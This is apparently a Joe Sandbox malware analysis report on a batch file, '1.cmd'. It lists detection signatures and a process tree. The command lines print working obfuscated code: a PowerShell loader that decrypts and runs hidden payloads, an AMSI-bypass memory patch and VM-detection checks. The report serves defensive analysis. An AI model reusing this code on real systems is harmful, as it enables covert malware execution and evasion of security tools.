Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1.cmd

Overview

General Information

Sample name:1.cmd
Analysis ID:1525388
MD5:19fc666f7494d78a55d6b50a0252c214
SHA1:8876cd520507cbfdc2e89e449baba52232a1df1b
SHA256:e96f8f61e3af77c429ae6af54c128f7b8420a45a0a63bdfcacd682773b8e5fc1
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
.NET source code contains process injector
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Creates an autostart registry key pointing to binary in C:\Windows
Creates autostart registry keys with suspicious names
Creates autostart registry keys with suspicious values (likely registry only malware)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs a global keyboard hook
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sets debug register (to hijack the execution of another thread)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential WinAPI Calls Via CommandLine
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powerup Write Hijack DLL
Suspicious command line found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Deletes files inside the Windows folder
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Powershell Execute Batch Script
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 6112 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 1732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 1816 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • findstr.exe (PID: 1072 cmdline: findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • WMIC.exe (PID: 1740 cmdline: wmic diskdrive get Manufacturer,Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • findstr.exe (PID: 2700 cmdline: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • cmd.exe (PID: 1072 cmdline: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • powershell.exe (PID: 3852 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
      • WerFault.exe (PID: 7300 cmdline: C:\Windows\system32\WerFault.exe -u -p 3852 -s 2212 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • cmd.exe (PID: 7740 cmdline: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 7788 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 7804 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
          • cmd.exe (PID: 7904 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WMIC.exe (PID: 7960 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
            • findstr.exe (PID: 7980 cmdline: findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
            • WMIC.exe (PID: 8040 cmdline: wmic diskdrive get Manufacturer,Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
            • findstr.exe (PID: 8056 cmdline: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
            • cmd.exe (PID: 8176 cmdline: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • powershell.exe (PID: 8184 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
              • WerFault.exe (PID: 7392 cmdline: C:\Windows\system32\WerFault.exe -u -p 8184 -s 2036 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
              • WerFault.exe (PID: 2756 cmdline: C:\Windows\system32\WerFault.exe -u -p 8184 -s 2248 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
              • schtasks.exe (PID: 3620 cmdline: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • conhost.exe (PID: 2104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • powershell.exe (PID: 7544 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                • conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • powershell.exe (PID: 7528 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • powershell.exe (PID: 5948 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:QuvobnauGMMc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uwMlljVVwbVUVD,[Parameter(Position=1)][Type]$qJfzFIqcrY)$WLjbMWfHUpI=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'f'+'l'+''+[Char](101)+'c'+'t'+''+[Char](101)+''+'d'+''+[Char](68)+'e'+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+''+[Char](109)+''+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+'e'+'l'+''+'e'+''+[Char](103)+'a'+[Char](116)+'eTy'+[Char](112)+'e',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+'A'+''+'n'+'s'+[Char](105)+''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$WLjbMWfHUpI.DefineConstructor(''+[Char](82)+'T'+'S'+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+'Na'+[Char](109)+''+'e'+','+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+'B'+''+'y'+''+'S'+''+[Char](105)+''+[Char](103)+',Pu'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$uwMlljVVwbVUVD).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+'i'+[Char](109)+''+'e'+''+','+''+[Char](77)+''+[Char](97)+''+'n'+''+'a'+''+'g'+''+'e'+''+[Char](100)+'');$WLjbMWfHUpI.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+'e',''+[Char](80)+'ubl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+'e'+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+','+'N'+'ew'+'S'+''+[Char](108)+''+[Char](111)+'t'+','+''+[Char](86)+''+'i'+'rt'+'u'+''+[Char](97)+''+[Char](108)+'',$qJfzFIqcrY,$uwMlljVVwbVUVD).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+'t'+''+'i'+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');Write-Output $WLjbMWfHUpI.CreateType();}$ulnmlpDbsuVQN=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+[Char](101)+''+[Char](109)+'.d'+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+'c'+[Char](114)+''+'o'+'s'+[Char](111)+'f'+[Char](116)+''+[Char](46)+'Wi'+'n'+'3'+'2'+''+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+'N'+'a'+'t'+'i'+''+[Char](118)+'eM'+[Char](101)+''+[Char](116)+''+'h'+''+'o'+'ds');$skqIwPbTYxVYhD=$ulnmlpDbsuVQN.GetMethod(''+[Char](71)+'e'+'t'+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+'dr'+'e'+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+'i'+'c,'+[Char](83)+''+[Char](116)+'a'+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$SlSshRHzgoUjvXmeTqL=QuvobnauGMMc @([String])([IntPtr]);$KUNWcDgsbwBzyQuTTnSbbx=QuvobnauGMMc @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$YxZiZRJBAeC=$ulnmlpDbsuVQN.GetMethod('G'+'e'+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+'le'+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+'n'+[Char](101)+'l'+'3'+''+[Char](50)+''+'.'+''+[Char](100)+''+'l'+''+[Char](108)+'')));$vMVwdwXXnratZh=$skqIwPbTYxVYhD.Invoke($Null,@([Object]$YxZiZRJBAeC,[Object]('L'+[Char](111)+''+'a'+''+'d'+'L'+[Char](105)+''+'b'+'r'+'a'+'r'+[Char](121)+''+[Char](65)+'')));$jdkLVqxnIKypBMyTV=$skqIwPbTYxVYhD.Invoke($Null,@([Object]$YxZiZRJBAeC,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+''+[Char](80)+''+[Char](114)+'o'+[Char](116)+'e'+[Char](99)+'t')));$NDrexjH=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vMVwdwXXnratZh,$SlSshRHzgoUjvXmeTqL).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$awqsGjGjEpzNvinnA=$skqIwPbTYxVYhD.Invoke($Null,@([Object]$NDrexjH,[Object](''+'A'+'ms'+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+'u'+''+[Char](102)+''+[Char](102)+'e'+'r'+'')));$JhEQuEJeuH=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jdkLVqxnIKypBMyTV,$KUNWcDgsbwBzyQuTTnSbbx).Invoke($awqsGjGjEpzNvinnA,[uint32]8,4,[ref]$JhEQuEJeuH);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$awqsGjGjEpzNvinnA,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jdkLVqxnIKypBMyTV,$KUNWcDgsbwBzyQuTTnSbbx).Invoke($awqsGjGjEpzNvinnA,[uint32]8,0x20,[ref]$JhEQuEJeuH);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+'W'+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](36)+'r'+[Char](98)+''+'x'+''+[Char](45)+''+'s'+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dllhost.exe (PID: 1244 cmdline: C:\Windows\System32\dllhost.exe /Processid:{33f9b6db-472d-4fae-86c7-d938bf69b9c0} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • winlogon.exe (PID: 552 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
      • lsass.exe (PID: 628 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
      • svchost.exe (PID: 920 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dwm.exe (PID: 988 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
      • WMIADAP.exe (PID: 6644 cmdline: wmiadap.exe /F /T /R MD5: 1BFFABBD200C850E6346820E92B915DC)
      • svchost.exe (PID: 364 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 356 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 696 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 592 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1044 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1084 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1200 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1252 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1296 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1316 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1408 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1488 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1496 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1552 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1572 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1652 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • Conhost.exe (PID: 6864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 2656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 3852INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x15b820:$b2: ::FromBase64String(
  • 0x15b87e:$b2: ::FromBase64String(
  • 0x1d42cc:$b2: ::FromBase64String(
  • 0x1d5758:$b2: ::FromBase64String(
  • 0x1d6580:$b2: ::FromBase64String(
  • 0x1d65de:$b2: ::FromBase64String(
  • 0x28a149:$b2: ::FromBase64String(
  • 0x28a1a7:$b2: ::FromBase64String(
  • 0x28ac3a:$b2: ::FromBase64String(
  • 0x28ac98:$b2: ::FromBase64String(
  • 0x1545bc:$s1: -join
  • 0x1e9e48:$s1: -join
  • 0x1f6f1d:$s1: -join
  • 0x1fa2ef:$s1: -join
  • 0x1fa9a1:$s1: -join
  • 0x1fc492:$s1: -join
  • 0x1fe698:$s1: -join
  • 0x1feebf:$s1: -join
  • 0x1ff72f:$s1: -join
  • 0x1ffe6a:$s1: -join
  • 0x1ffe9c:$s1: -join
Process Memory Space: powershell.exe PID: 8184INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x2a065:$b2: ::FromBase64String(
  • 0x2a0c3:$b2: ::FromBase64String(
  • 0xa2b27:$b2: ::FromBase64String(
  • 0xa9a99:$b2: ::FromBase64String(
  • 0xa9af7:$b2: ::FromBase64String(
  • 0xb0222:$b2: ::FromBase64String(
  • 0x22e18:$s1: -join
  • 0xcc148:$s1: -join
  • 0xd7af4:$s1: -join
  • 0x249b4:$s3: Reverse
  • 0xafeef:$s3: Reverse
  • 0x1d84d:$s4: +=
  • 0x1d8ef:$s4: +=
  • 0x21037:$s4: +=
  • 0x22aed:$s4: +=
  • 0x22d03:$s4: +=
  • 0x22dfa:$s4: +=
  • 0xcd680:$s4: +=
  • 0xcfeab:$s4: +=
  • 0xcff2a:$s4: +=
  • 0xd0145:$s4: +=

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, 